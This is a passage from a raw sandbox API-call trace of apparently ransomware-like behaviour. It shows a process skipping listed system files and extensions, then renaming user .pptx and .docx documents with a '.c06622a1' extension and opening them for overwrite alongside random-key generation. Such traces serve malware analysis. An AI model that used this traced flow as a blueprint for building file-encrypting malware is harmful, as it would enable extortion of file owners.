cAlternateFileName="RVL-U9~1.PPT")) returned 1 [0149.714] _wcsicmp (_Str1="rvL-U9LVkxG.pptx", _Str2="README.c06622a1.TXT") returned 17 [0149.714] wcsstr (_Str="rvL-U9LVkxG.pptx", _SubStr="README") returned 0x0 [0149.714] _wcsicmp (_Str1="autorun.inf", _Str2="rvL-U9LVkxG.pptx") returned -17 [0149.714] wcslen (_String="autorun.inf") returned 0xb [0149.714] _wcsicmp (_Str1="boot.ini", _Str2="rvL-U9LVkxG.pptx") returned -16 [0149.714] wcslen (_String="boot.ini") returned 0x8 [0149.714] _wcsicmp (_Str1="bootfont.bin", _Str2="rvL-U9LVkxG.pptx") returned -16 [0149.714] wcslen (_String="bootfont.bin") returned 0xc [0149.714] _wcsicmp (_Str1="bootsect.bak", _Str2="rvL-U9LVkxG.pptx") returned -16 [0149.714] wcslen (_String="bootsect.bak") returned 0xc [0149.714] _wcsicmp (_Str1="desktop.ini", _Str2="rvL-U9LVkxG.pptx") returned -14 [0149.714] wcslen (_String="desktop.ini") returned 0xb [0149.714] _wcsicmp (_Str1="iconcache.db", _Str2="rvL-U9LVkxG.pptx") returned -9 [0149.714] wcslen (_String="iconcache.db") returned 0xc [0149.714] _wcsicmp (_Str1="ntldr", _Str2="rvL-U9LVkxG.pptx") returned -4 [0149.714] wcslen (_String="ntldr") returned 0x5 [0149.714] _wcsicmp (_Str1="ntuser.dat", _Str2="rvL-U9LVkxG.pptx") returned -4 [0149.715] wcslen (_String="ntuser.dat") returned 0xa [0149.715] _wcsicmp (_Str1="ntuser.dat.log", _Str2="rvL-U9LVkxG.pptx") returned -4 [0149.715] wcslen (_String="ntuser.dat.log") returned 0xe [0149.715] _wcsicmp (_Str1="ntuser.ini", _Str2="rvL-U9LVkxG.pptx") returned -4 [0149.715] wcslen (_String="ntuser.ini") returned 0xa [0149.715] _wcsicmp (_Str1="thumbs.db", _Str2="rvL-U9LVkxG.pptx") returned 2 [0149.715] wcslen (_String="thumbs.db") returned 0x9 [0149.715] _wcsicmp (_Str1="386", _Str2="pptx") returned -61 [0149.715] wcslen (_String="386") returned 0x3 [0149.715] _wcsicmp (_Str1="adv", _Str2="pptx") returned -15 [0149.715] wcslen (_String="adv") returned 0x3 [0149.715] _wcsicmp (_Str1="ani", _Str2="pptx") returned -15 [0149.715] wcslen (_String="ani") returned 0x3 [0149.715] _wcsicmp (_Str1="bat", _Str2="pptx") returned -14 [0149.715] wcslen (_String="bat") returned 0x3 [0149.715] _wcsicmp (_Str1="bin", _Str2="pptx") returned -14 [0149.715] wcslen (_String="bin") returned 0x3 [0149.715] _wcsicmp (_Str1="cab", _Str2="pptx") returned -13 [0149.715] wcslen (_String="cab") returned 0x3 [0149.715] _wcsicmp (_Str1="cmd", _Str2="pptx") returned -13 [0149.715] wcslen (_String="cmd") returned 0x3 [0149.715] _wcsicmp (_Str1="com", _Str2="pptx") returned -13 [0149.715] wcslen (_String="com") returned 0x3 [0149.715] _wcsicmp (_Str1="cpl", _Str2="pptx") returned -13 [0149.715] wcslen (_String="cpl") returned 0x3 [0149.716] _wcsicmp (_Str1="cur", _Str2="pptx") returned -13 [0149.716] wcslen (_String="cur") returned 0x3 [0149.716] _wcsicmp (_Str1="deskthemepack", _Str2="pptx") returned -12 [0149.716] wcslen (_String="deskthemepack") returned 0xd [0149.716] _wcsicmp (_Str1="diagcab", _Str2="pptx") returned -12 [0149.716] wcslen (_String="diagcab") returned 0x7 [0149.716] _wcsicmp (_Str1="diagcfg", _Str2="pptx") returned -12 [0149.716] wcslen (_String="diagcfg") returned 0x7 [0149.716] _wcsicmp (_Str1="diagpkg", _Str2="pptx") returned -12 [0149.716] wcslen (_String="diagpkg") returned 0x7 [0149.716] _wcsicmp (_Str1="dll", _Str2="pptx") returned -12 [0149.716] wcslen (_String="dll") returned 0x3 [0149.716] _wcsicmp (_Str1="drv", _Str2="pptx") returned -12 [0149.716] wcslen (_String="drv") returned 0x3 [0149.716] _wcsicmp (_Str1="exe", _Str2="pptx") returned -11 [0149.716] wcslen (_String="exe") returned 0x3 [0149.716] _wcsicmp (_Str1="hlp", _Str2="pptx") returned -8 [0149.716] wcslen (_String="hlp") returned 0x3 [0149.716] _wcsicmp (_Str1="icl", _Str2="pptx") returned -7 [0149.716] wcslen (_String="icl") returned 0x3 [0149.716] _wcsicmp (_Str1="icns", _Str2="pptx") returned -7 [0149.716] wcslen (_String="icns") returned 0x4 [0149.716] _wcsicmp (_Str1="ico", _Str2="pptx") returned -7 [0149.716] wcslen (_String="ico") returned 0x3 [0149.716] _wcsicmp (_Str1="ics", _Str2="pptx") returned -7 [0149.716] wcslen (_String="ics") returned 0x3 [0149.717] _wcsicmp (_Str1="idx", _Str2="pptx") returned -7 [0149.717] wcslen (_String="idx") returned 0x3 [0149.717] _wcsicmp (_Str1="ldf", _Str2="pptx") returned -4 [0149.717] wcslen (_String="ldf") returned 0x3 [0149.717] _wcsicmp (_Str1="lnk", _Str2="pptx") returned -4 [0149.717] wcslen (_String="lnk") returned 0x3 [0149.717] _wcsicmp (_Str1="mod", _Str2="pptx") returned -3 [0149.717] wcslen (_String="mod") returned 0x3 [0149.717] _wcsicmp (_Str1="mpa", _Str2="pptx") returned -3 [0149.717] wcslen (_String="mpa") returned 0x3 [0149.717] _wcsicmp (_Str1="msc", _Str2="pptx") returned -3 [0149.717] wcslen (_String="msc") returned 0x3 [0149.717] _wcsicmp (_Str1="msp", _Str2="pptx") returned -3 [0149.717] wcslen (_String="msp") returned 0x3 [0149.717] _wcsicmp (_Str1="msstyles", _Str2="pptx") returned -3 [0149.717] wcslen (_String="msstyles") returned 0x8 [0149.717] _wcsicmp (_Str1="msu", _Str2="pptx") returned -3 [0149.717] wcslen (_String="msu") returned 0x3 [0149.717] _wcsicmp (_Str1="nls", _Str2="pptx") returned -2 [0149.717] wcslen (_String="nls") returned 0x3 [0149.717] _wcsicmp (_Str1="nomedia", _Str2="pptx") returned -2 [0149.717] wcslen (_String="nomedia") returned 0x7 [0149.717] _wcsicmp (_Str1="ocx", _Str2="pptx") returned -1 [0149.717] wcslen (_String="ocx") returned 0x3 [0149.717] _wcsicmp (_Str1="prf", _Str2="pptx") returned 2 [0149.717] wcslen (_String="prf") returned 0x3 [0149.718] _wcsicmp (_Str1="ps1", _Str2="pptx") returned 3 [0149.718] wcslen (_String="ps1") returned 0x3 [0149.718] _wcsicmp (_Str1="rom", _Str2="pptx") returned 2 [0149.718] wcslen (_String="rom") returned 0x3 [0149.718] _wcsicmp (_Str1="rtp", _Str2="pptx") returned 2 [0149.718] wcslen (_String="rtp") returned 0x3 [0149.718] _wcsicmp (_Str1="scr", _Str2="pptx") returned 3 [0149.718] wcslen (_String="scr") returned 0x3 [0149.718] _wcsicmp (_Str1="shs", _Str2="pptx") returned 3 [0149.718] wcslen (_String="shs") returned 0x3 [0149.718] _wcsicmp (_Str1="spl", _Str2="pptx") returned 3 [0149.718] wcslen (_String="spl") returned 0x3 [0149.718] _wcsicmp (_Str1="sys", _Str2="pptx") returned 3 [0149.718] wcslen (_String="sys") returned 0x3 [0149.718] _wcsicmp (_Str1="theme", _Str2="pptx") returned 4 [0149.718] wcslen (_String="theme") returned 0x5 [0149.718] _wcsicmp (_Str1="themepack", _Str2="pptx") returned 4 [0149.718] wcslen (_String="themepack") returned 0x9 [0149.718] _wcsicmp (_Str1="wpx", _Str2="pptx") returned 7 [0149.718] wcslen (_String="wpx") returned 0x3 [0149.718] _wcsicmp (_Str1="lock", _Str2="pptx") returned -4 [0149.718] wcslen (_String="lock") returned 0x4 [0149.718] _wcsicmp (_Str1="key", _Str2="pptx") returned -5 [0149.718] wcslen (_String="key") returned 0x3 [0149.718] _wcsicmp (_Str1="hta", _Str2="pptx") returned -8 [0149.718] wcslen (_String="hta") returned 0x3 [0149.719] _wcsicmp (_Str1="msi", _Str2="pptx") returned -3 [0149.719] wcslen (_String="msi") returned 0x3 [0149.719] _wcsicmp (_Str1="pdb", _Str2="pptx") returned -12 [0149.719] wcslen (_String="pdb") returned 0x3 [0149.719] _wcsicmp (_Str1="sql", _Str2="pptx") returned 3 [0149.719] wcslen (_String="sql") returned 0x3 [0149.719] _wcsicmp (_Str1="sqlite", _Str2="pptx") returned 3 [0149.719] wcslen (_String="sqlite") returned 0x6 [0149.719] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0149.719] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0149.719] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0149.719] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0149.719] wcscpy (in: _Dest=0x44d00d0, _Source="rvL-U9LVkxG.pptx" | out: _Dest="rvL-U9LVkxG.pptx") returned="rvL-U9LVkxG.pptx" [0149.719] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rvL-U9LVkxG.pptx", dwFileAttributes=0x80) returned 1 [0149.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rvL-U9LVkxG.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rvl-u9lvkxg.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0149.720] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.720] ReadFile (in: hFile=0x61c, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0149.721] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xf3d7ffff [0149.721] RtlComputeCrc32 (PartialCrc=0xffff, Buffer=0x3feb74, Length=0x80) returned 0xcaf00eac [0149.721] RtlComputeCrc32 (PartialCrc=0xeac, Buffer=0x3feb74, Length=0x80) returned 0xc86c935a [0149.721] RtlComputeCrc32 (PartialCrc=0x935a, Buffer=0x3feb74, Length=0x80) returned 0xd8671583 [0149.721] RtlComputeCrc32 (PartialCrc=0x1583, Buffer=0x3feb74, Length=0x80) returned 0x267d754d [0149.721] CloseHandle (hObject=0x61c) returned 1 [0149.721] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0149.721] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rvL-U9LVkxG.pptx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rvL-U9LVkxG.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rvL-U9LVkxG.pptx" [0149.721] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rvL-U9LVkxG.pptx") returned 0x3c [0149.721] wcscpy (in: _Dest=0x44e00f8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.721] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rvL-U9LVkxG.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rvl-u9lvkxg.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rvL-U9LVkxG.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rvl-u9lvkxg.pptx.c06622a1"), dwFlags=0x8) returned 1 [0149.723] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rvL-U9LVkxG.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rvl-u9lvkxg.pptx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x61c [0149.723] CreateIoCompletionPort (FileHandle=0x61c, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0149.724] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x53f0020 [0149.730] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x55061641 [0149.731] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7d90bc1e [0149.731] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7913a85a [0149.731] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3b1a48e1 [0149.731] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3afe3069 [0149.731] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xd15dede [0149.731] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x202cea58 [0149.731] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7d2f6185 [0149.734] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x53f0094, Length=0x80) returned 0xa11dd170 [0149.734] RtlComputeCrc32 (PartialCrc=0xd170, Buffer=0x53f0094, Length=0x80) returned 0x1c6fd745 [0149.734] RtlComputeCrc32 (PartialCrc=0xd745, Buffer=0x53f0094, Length=0x80) returned 0x58ca91c6 [0149.734] RtlComputeCrc32 (PartialCrc=0x91c6, Buffer=0x53f0094, Length=0x80) returned 0x3854c3dc [0149.734] RtlComputeCrc32 (PartialCrc=0xc3dc, Buffer=0x53f0094, Length=0x80) returned 0x218430f5 [0149.734] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x53f0020) returned 1 [0149.734] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0149.734] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0149.734] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14e18150, ftCreationTime.dwHighDateTime=0x1d58518, ftLastAccessTime.dwLowDateTime=0x57d8b4a0, ftLastAccessTime.dwHighDateTime=0x1d5c4a7, ftLastWriteTime.dwLowDateTime=0x57d8b4a0, ftLastWriteTime.dwHighDateTime=0x1d5c4a7, nFileSizeHigh=0x0, nFileSizeLow=0x52f, dwReserved0=0x0, dwReserved1=0x0, cFileName="SBssxnpEdQSm8I5.docx", cAlternateFileName="SBSSXN~1.DOC")) returned 1 [0149.734] _wcsicmp (_Str1="SBssxnpEdQSm8I5.docx", _Str2="README.c06622a1.TXT") returned 1 [0149.734] wcsstr (_Str="SBssxnpEdQSm8I5.docx", _SubStr="README") returned 0x0 [0149.734] _wcsicmp (_Str1="autorun.inf", _Str2="SBssxnpEdQSm8I5.docx") returned -18 [0149.734] wcslen (_String="autorun.inf") returned 0xb [0149.734] _wcsicmp (_Str1="boot.ini", _Str2="SBssxnpEdQSm8I5.docx") returned -17 [0149.734] wcslen (_String="boot.ini") returned 0x8 [0149.734] _wcsicmp (_Str1="bootfont.bin", _Str2="SBssxnpEdQSm8I5.docx") returned -17 [0149.734] wcslen (_String="bootfont.bin") returned 0xc [0149.735] _wcsicmp (_Str1="bootsect.bak", _Str2="SBssxnpEdQSm8I5.docx") returned -17 [0149.735] wcslen (_String="bootsect.bak") returned 0xc [0149.735] _wcsicmp (_Str1="desktop.ini", _Str2="SBssxnpEdQSm8I5.docx") returned -15 [0149.735] wcslen (_String="desktop.ini") returned 0xb [0149.735] _wcsicmp (_Str1="iconcache.db", _Str2="SBssxnpEdQSm8I5.docx") returned -10 [0149.735] wcslen (_String="iconcache.db") returned 0xc [0149.735] _wcsicmp (_Str1="ntldr", _Str2="SBssxnpEdQSm8I5.docx") returned -5 [0149.735] wcslen (_String="ntldr") returned 0x5 [0149.735] _wcsicmp (_Str1="ntuser.dat", _Str2="SBssxnpEdQSm8I5.docx") returned -5 [0149.735] wcslen (_String="ntuser.dat") returned 0xa [0149.735] _wcsicmp (_Str1="ntuser.dat.log", _Str2="SBssxnpEdQSm8I5.docx") returned -5 [0149.735] wcslen (_String="ntuser.dat.log") returned 0xe [0149.735] _wcsicmp (_Str1="ntuser.ini", _Str2="SBssxnpEdQSm8I5.docx") returned -5 [0149.735] wcslen (_String="ntuser.ini") returned 0xa [0149.735] _wcsicmp (_Str1="thumbs.db", _Str2="SBssxnpEdQSm8I5.docx") returned 1 [0149.735] wcslen (_String="thumbs.db") returned 0x9 [0149.735] _wcsicmp (_Str1="386", _Str2="docx") returned -49 [0149.735] wcslen (_String="386") returned 0x3 [0149.735] _wcsicmp (_Str1="adv", _Str2="docx") returned -3 [0149.735] wcslen (_String="adv") returned 0x3 [0149.735] _wcsicmp (_Str1="ani", _Str2="docx") returned -3 [0149.735] wcslen (_String="ani") returned 0x3 [0149.735] _wcsicmp (_Str1="bat", _Str2="docx") returned -2 [0149.735] wcslen (_String="bat") returned 0x3 [0149.735] _wcsicmp (_Str1="bin", _Str2="docx") returned -2 [0149.736] wcslen (_String="bin") returned 0x3 [0149.736] _wcsicmp (_Str1="cab", _Str2="docx") returned -1 [0149.736] wcslen (_String="cab") returned 0x3 [0149.736] _wcsicmp (_Str1="cmd", _Str2="docx") returned -1 [0149.736] wcslen (_String="cmd") returned 0x3 [0149.736] _wcsicmp (_Str1="com", _Str2="docx") returned -1 [0149.736] wcslen (_String="com") returned 0x3 [0149.736] _wcsicmp (_Str1="cpl", _Str2="docx") returned -1 [0149.736] wcslen (_String="cpl") returned 0x3 [0149.736] _wcsicmp (_Str1="cur", _Str2="docx") returned -1 [0149.736] wcslen (_String="cur") returned 0x3 [0149.736] _wcsicmp (_Str1="deskthemepack", _Str2="docx") returned -10 [0149.736] wcslen (_String="deskthemepack") returned 0xd [0149.736] _wcsicmp (_Str1="diagcab", _Str2="docx") returned -6 [0149.736] wcslen (_String="diagcab") returned 0x7 [0149.736] _wcsicmp (_Str1="diagcfg", _Str2="docx") returned -6 [0149.736] wcslen (_String="diagcfg") returned 0x7 [0149.736] _wcsicmp (_Str1="diagpkg", _Str2="docx") returned -6 [0149.736] wcslen (_String="diagpkg") returned 0x7 [0149.736] _wcsicmp (_Str1="dll", _Str2="docx") returned -3 [0149.736] wcslen (_String="dll") returned 0x3 [0149.737] _wcsicmp (_Str1="drv", _Str2="docx") returned 3 [0149.737] wcslen (_String="drv") returned 0x3 [0149.737] _wcsicmp (_Str1="exe", _Str2="docx") returned 1 [0149.737] wcslen (_String="exe") returned 0x3 [0149.737] _wcsicmp (_Str1="hlp", _Str2="docx") returned 4 [0149.737] wcslen (_String="hlp") returned 0x3 [0149.737] _wcsicmp (_Str1="icl", _Str2="docx") returned 5 [0149.737] wcslen (_String="icl") returned 0x3 [0149.737] _wcsicmp (_Str1="icns", _Str2="docx") returned 5 [0149.737] wcslen (_String="icns") returned 0x4 [0149.737] _wcsicmp (_Str1="ico", _Str2="docx") returned 5 [0149.737] wcslen (_String="ico") returned 0x3 [0149.737] _wcsicmp (_Str1="ics", _Str2="docx") returned 5 [0149.737] wcslen (_String="ics") returned 0x3 [0149.737] _wcsicmp (_Str1="idx", _Str2="docx") returned 5 [0149.737] wcslen (_String="idx") returned 0x3 [0149.737] _wcsicmp (_Str1="ldf", _Str2="docx") returned 8 [0149.737] wcslen (_String="ldf") returned 0x3 [0149.737] _wcsicmp (_Str1="lnk", _Str2="docx") returned 8 [0149.737] wcslen (_String="lnk") returned 0x3 [0149.737] _wcsicmp (_Str1="mod", _Str2="docx") returned 9 [0149.737] wcslen (_String="mod") returned 0x3 [0149.737] _wcsicmp (_Str1="mpa", _Str2="docx") returned 9 [0149.737] wcslen (_String="mpa") returned 0x3 [0149.737] _wcsicmp (_Str1="msc", _Str2="docx") returned 9 [0149.737] wcslen (_String="msc") returned 0x3 [0149.737] _wcsicmp (_Str1="msp", _Str2="docx") returned 9 [0149.738] wcslen (_String="msp") returned 0x3 [0149.738] _wcsicmp (_Str1="msstyles", _Str2="docx") returned 9 [0149.738] wcslen (_String="msstyles") returned 0x8 [0149.738] _wcsicmp (_Str1="msu", _Str2="docx") returned 9 [0149.738] wcslen (_String="msu") returned 0x3 [0149.738] _wcsicmp (_Str1="nls", _Str2="docx") returned 10 [0149.738] wcslen (_String="nls") returned 0x3 [0149.738] _wcsicmp (_Str1="nomedia", _Str2="docx") returned 10 [0149.738] wcslen (_String="nomedia") returned 0x7 [0149.738] _wcsicmp (_Str1="ocx", _Str2="docx") returned 11 [0149.738] wcslen (_String="ocx") returned 0x3 [0149.738] _wcsicmp (_Str1="prf", _Str2="docx") returned 12 [0149.738] wcslen (_String="prf") returned 0x3 [0149.738] _wcsicmp (_Str1="ps1", _Str2="docx") returned 12 [0149.738] wcslen (_String="ps1") returned 0x3 [0149.738] _wcsicmp (_Str1="rom", _Str2="docx") returned 14 [0149.738] wcslen (_String="rom") returned 0x3 [0149.738] _wcsicmp (_Str1="rtp", _Str2="docx") returned 14 [0149.738] wcslen (_String="rtp") returned 0x3 [0149.738] _wcsicmp (_Str1="scr", _Str2="docx") returned 15 [0149.738] wcslen (_String="scr") returned 0x3 [0149.738] _wcsicmp (_Str1="shs", _Str2="docx") returned 15 [0149.738] wcslen (_String="shs") returned 0x3 [0149.738] _wcsicmp (_Str1="spl", _Str2="docx") returned 15 [0149.738] wcslen (_String="spl") returned 0x3 [0149.738] _wcsicmp (_Str1="sys", _Str2="docx") returned 15 [0149.739] wcslen (_String="sys") returned 0x3 [0149.739] _wcsicmp (_Str1="theme", _Str2="docx") returned 16 [0149.739] wcslen (_String="theme") returned 0x5 [0149.739] _wcsicmp (_Str1="themepack", _Str2="docx") returned 16 [0149.739] wcslen (_String="themepack") returned 0x9 [0149.739] _wcsicmp (_Str1="wpx", _Str2="docx") returned 19 [0149.739] wcslen (_String="wpx") returned 0x3 [0149.739] _wcsicmp (_Str1="lock", _Str2="docx") returned 8 [0149.739] wcslen (_String="lock") returned 0x4 [0149.739] _wcsicmp (_Str1="key", _Str2="docx") returned 7 [0149.739] wcslen (_String="key") returned 0x3 [0149.739] _wcsicmp (_Str1="hta", _Str2="docx") returned 4 [0149.739] wcslen (_String="hta") returned 0x3 [0149.739] _wcsicmp (_Str1="msi", _Str2="docx") returned 9 [0149.739] wcslen (_String="msi") returned 0x3 [0149.739] _wcsicmp (_Str1="pdb", _Str2="docx") returned 12 [0149.739] wcslen (_String="pdb") returned 0x3 [0149.739] _wcsicmp (_Str1="sql", _Str2="docx") returned 15 [0149.739] wcslen (_String="sql") returned 0x3 [0149.739] _wcsicmp (_Str1="sqlite", _Str2="docx") returned 15 [0149.739] wcslen (_String="sqlite") returned 0x6 [0149.739] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0149.739] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0149.740] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0149.740] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0149.740] wcscpy (in: _Dest=0x44d00d0, _Source="SBssxnpEdQSm8I5.docx" | out: _Dest="SBssxnpEdQSm8I5.docx") returned="SBssxnpEdQSm8I5.docx" [0149.740] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SBssxnpEdQSm8I5.docx", dwFileAttributes=0x80) returned 1 [0149.740] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SBssxnpEdQSm8I5.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sbssxnpedqsm8i5.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x668 [0149.740] SetFilePointerEx (in: hFile=0x668, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.740] ReadFile (in: hFile=0x668, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0149.741] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xd10c2a06 [0149.741] RtlComputeCrc32 (PartialCrc=0x2a06, Buffer=0x3feb74, Length=0x80) returned 0xc185c0e0 [0149.741] RtlComputeCrc32 (PartialCrc=0xc0e0, Buffer=0x3feb74, Length=0x80) returned 0xa8dd2938 [0149.741] RtlComputeCrc32 (PartialCrc=0x2938, Buffer=0x3feb74, Length=0x80) returned 0x88893657 [0149.741] RtlComputeCrc32 (PartialCrc=0x3657, Buffer=0x3feb74, Length=0x80) returned 0xd9b6e30 [0149.741] CloseHandle (hObject=0x668) returned 1 [0149.741] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0149.741] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SBssxnpEdQSm8I5.docx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SBssxnpEdQSm8I5.docx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SBssxnpEdQSm8I5.docx" [0149.741] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SBssxnpEdQSm8I5.docx") returned 0x40 [0149.741] wcscpy (in: _Dest=0x44e0100, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.741] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SBssxnpEdQSm8I5.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sbssxnpedqsm8i5.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SBssxnpEdQSm8I5.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sbssxnpedqsm8i5.docx.c06622a1"), dwFlags=0x8) returned 1 [0149.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SBssxnpEdQSm8I5.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sbssxnpedqsm8i5.docx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x668 [0149.744] CreateIoCompletionPort (FileHandle=0x668, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0149.744] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x5480020 [0149.751] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5afe6b6c [0149.751] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x592934d3 [0149.751] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4228f65b [0149.751] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x50ff62a4 [0149.751] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xd54b022 [0149.751] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x39489b70 [0149.751] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x560e3f37 [0149.751] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4a62b453 [0149.754] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x5480094, Length=0x80) returned 0xc9e8cf90 [0149.754] RtlComputeCrc32 (PartialCrc=0xcf90, Buffer=0x5480094, Length=0x80) returned 0x262f06cf [0149.754] RtlComputeCrc32 (PartialCrc=0x6cf, Buffer=0x5480094, Length=0x80) returned 0x1a61e806 